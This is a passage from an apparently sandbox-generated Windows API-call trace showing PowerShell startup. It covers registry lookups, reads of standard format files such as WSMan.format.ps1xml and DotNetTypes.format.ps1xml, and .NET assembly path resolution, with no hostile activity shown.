	[0802.581] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b73dd90, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0802.581] CoTaskMemFree (pv=0x1b73dd90) 
	[0802.581] RegCloseKey (hKey=0x300) returned 0x0
	[0802.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0802.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0802.589] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x57266b5f, Data2=0xd495, Data3=0x4231, Data4=([0]=0xb9, [1]=0xd4, [2]=0xd0, [3]=0x8b, [4]=0x98, [5]=0xc0, [6]=0xc1, [7]=0xda))) returned 0x0
	[0802.604] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x67e65466, Data2=0xa0ff, Data3=0x42c5, Data4=([0]=0xb9, [1]=0x71, [2]=0x13, [3]=0x81, [4]=0xfa, [5]=0x34, [6]=0xac, [7]=0xa4))) returned 0x0
	[0802.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0802.607] SetErrorMode (uMode=0x1) returned 0x1
	[0802.608] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0802.608] GetFileType (hFile=0x300) returned 0x1
	[0802.608] SetErrorMode (uMode=0x1) returned 0x1
	[0802.608] GetFileType (hFile=0x300) returned 0x1
	[0802.608] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.609] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.610] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.611] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0802.611] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.408] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0xfb2, lpOverlapped=0x0) returned 1
	[0803.408] ReadFile (in: hFile=0x300, lpBuffer=0x333c422, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333c422*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0803.408] ReadFile (in: hFile=0x300, lpBuffer=0x333cd08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333cd08*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0803.408] CloseHandle (hObject=0x300) returned 1
	[0803.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.409] SetErrorMode (uMode=0x1) returned 0x1
	[0803.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0803.409] SetErrorMode (uMode=0x1) returned 0x1
	[0803.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.409] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x300) returned 0x0
	[0803.409] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0803.409] CoTaskMemAlloc (cb=0x5a) returned 0x1b73dd90
	[0803.410] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b73dd90, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0803.410] CoTaskMemFree (pv=0x1b73dd90) 
	[0803.410] RegCloseKey (hKey=0x300) returned 0x0
	[0803.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.416] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x94861a6b, Data2=0x4448, Data3=0x42fc, Data4=([0]=0xa2, [1]=0x37, [2]=0xfe, [3]=0x6c, [4]=0x1e, [5]=0xd5, [6]=0x2e, [7]=0x4))) returned 0x0
	[0803.420] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x215aeda0, Data2=0x8648, Data3=0x4e3c, Data4=([0]=0x9d, [1]=0x7f, [2]=0xb5, [3]=0x8c, [4]=0x29, [5]=0x75, [6]=0x41, [7]=0x13))) returned 0x0
	[0803.421] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4dc278f4, Data2=0x4744, Data3=0x414c, Data4=([0]=0xad, [1]=0x4a, [2]=0xb, [3]=0x76, [4]=0xe0, [5]=0xfd, [6]=0x14, [7]=0xc3))) returned 0x0
	[0803.421] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x8dfea4e2, Data2=0xa497, Data3=0x48a7, Data4=([0]=0xb4, [1]=0xcd, [2]=0xd3, [3]=0xc7, [4]=0x52, [5]=0x3f, [6]=0xae, [7]=0x6c))) returned 0x0
	[0803.421] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3460bf62, Data2=0x2c5, Data3=0x4f93, Data4=([0]=0x96, [1]=0xde, [2]=0x20, [3]=0xb4, [4]=0xf2, [5]=0x4, [6]=0x40, [7]=0x8b))) returned 0x0
	[0803.422] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x50012f8d, Data2=0x96ee, Data3=0x4cc4, Data4=([0]=0x8c, [1]=0xad, [2]=0x1b, [3]=0x4d, [4]=0x74, [5]=0xce, [6]=0x59, [7]=0x1a))) returned 0x0
	[0803.422] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0803.422] GetFileType (hFile=0x300) returned 0x1
	[0803.422] SetErrorMode (uMode=0x1) returned 0x1
	[0803.422] GetFileType (hFile=0x300) returned 0x1
	[0803.423] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.424] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.425] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.425] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.427] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.427] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0803.428] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0xaca, lpOverlapped=0x0) returned 1
	[0803.428] ReadFile (in: hFile=0x300, lpBuffer=0x338809a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x338809a*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0803.428] ReadFile (in: hFile=0x300, lpBuffer=0x3388a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3388a68*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0803.428] CloseHandle (hObject=0x300) returned 1
	[0803.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.429] SetErrorMode (uMode=0x1) returned 0x1
	[0803.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0803.429] SetErrorMode (uMode=0x1) returned 0x1
	[0803.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x300) returned 0x0
	[0803.430] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0803.430] CoTaskMemAlloc (cb=0x5a) returned 0x1b73dd90
	[0803.430] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b73dd90, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0803.430] CoTaskMemFree (pv=0x1b73dd90) 
	[0803.430] RegCloseKey (hKey=0x300) returned 0x0
	[0803.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0803.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0803.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0804.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0804.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0804.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0804.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0804.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0804.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0804.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0804.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0804.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0804.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0805.542] VirtualQuery (in: lpAddress=0x16bf40, lpBuffer=0x16ce00, dwLength=0x30 | out: lpBuffer=0x16ce00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.543] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6cb7bb71, Data2=0x74c9, Data3=0x442b, Data4=([0]=0x9e, [1]=0xe3, [2]=0xaa, [3]=0x1f, [4]=0xef, [5]=0x3b, [6]=0xf7, [7]=0x26))) returned 0x0
	[0805.544] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x9ac7251f, Data2=0x49ef, Data3=0x4dd0, Data4=([0]=0x99, [1]=0xb0, [2]=0x27, [3]=0x52, [4]=0xab, [5]=0xed, [6]=0xd4, [7]=0x35))) returned 0x0
	[0805.545] VirtualQuery (in: lpAddress=0x16c0f0, lpBuffer=0x16cfb0, dwLength=0x30 | out: lpBuffer=0x16cfb0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.545] VirtualQuery (in: lpAddress=0x16c0f0, lpBuffer=0x16cfb0, dwLength=0x30 | out: lpBuffer=0x16cfb0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.546] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x284a8fb7, Data2=0xae4f, Data3=0x4cfc, Data4=([0]=0xab, [1]=0xe8, [2]=0x79, [3]=0x21, [4]=0xe7, [5]=0xa5, [6]=0xd2, [7]=0x97))) returned 0x0
	[0805.549] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xec94c722, Data2=0x14ae, Data3=0x4b04, Data4=([0]=0x8b, [1]=0xfa, [2]=0x22, [3]=0x64, [4]=0xad, [5]=0xcb, [6]=0x3e, [7]=0x4))) returned 0x0
	[0805.550] VirtualQuery (in: lpAddress=0x16c340, lpBuffer=0x16d200, dwLength=0x30 | out: lpBuffer=0x16d200*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.551] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x47a655fa, Data2=0x30f8, Data3=0x4ffe, Data4=([0]=0x8d, [1]=0x19, [2]=0x71, [3]=0x78, [4]=0x83, [5]=0xe9, [6]=0xff, [7]=0x6))) returned 0x0
	[0805.551] VirtualQuery (in: lpAddress=0x16b9b0, lpBuffer=0x16c870, dwLength=0x30 | out: lpBuffer=0x16c870*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.551] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3077f851, Data2=0xbaa8, Data3=0x4a39, Data4=([0]=0x8d, [1]=0x90, [2]=0x30, [3]=0x2d, [4]=0x51, [5]=0xd2, [6]=0x32, [7]=0xd4))) returned 0x0
	[0805.552] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x37a32755, Data2=0x9e46, Data3=0x474a, Data4=([0]=0x87, [1]=0x51, [2]=0x15, [3]=0x9e, [4]=0x91, [5]=0x4d, [6]=0x5c, [7]=0x22))) returned 0x0
	[0805.552] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0805.552] GetFileType (hFile=0x2ec) returned 0x1
	[0805.552] SetErrorMode (uMode=0x1) returned 0x1
	[0805.552] GetFileType (hFile=0x2ec) returned 0x1
	[0805.552] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.553] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.553] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.553] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.553] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.553] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
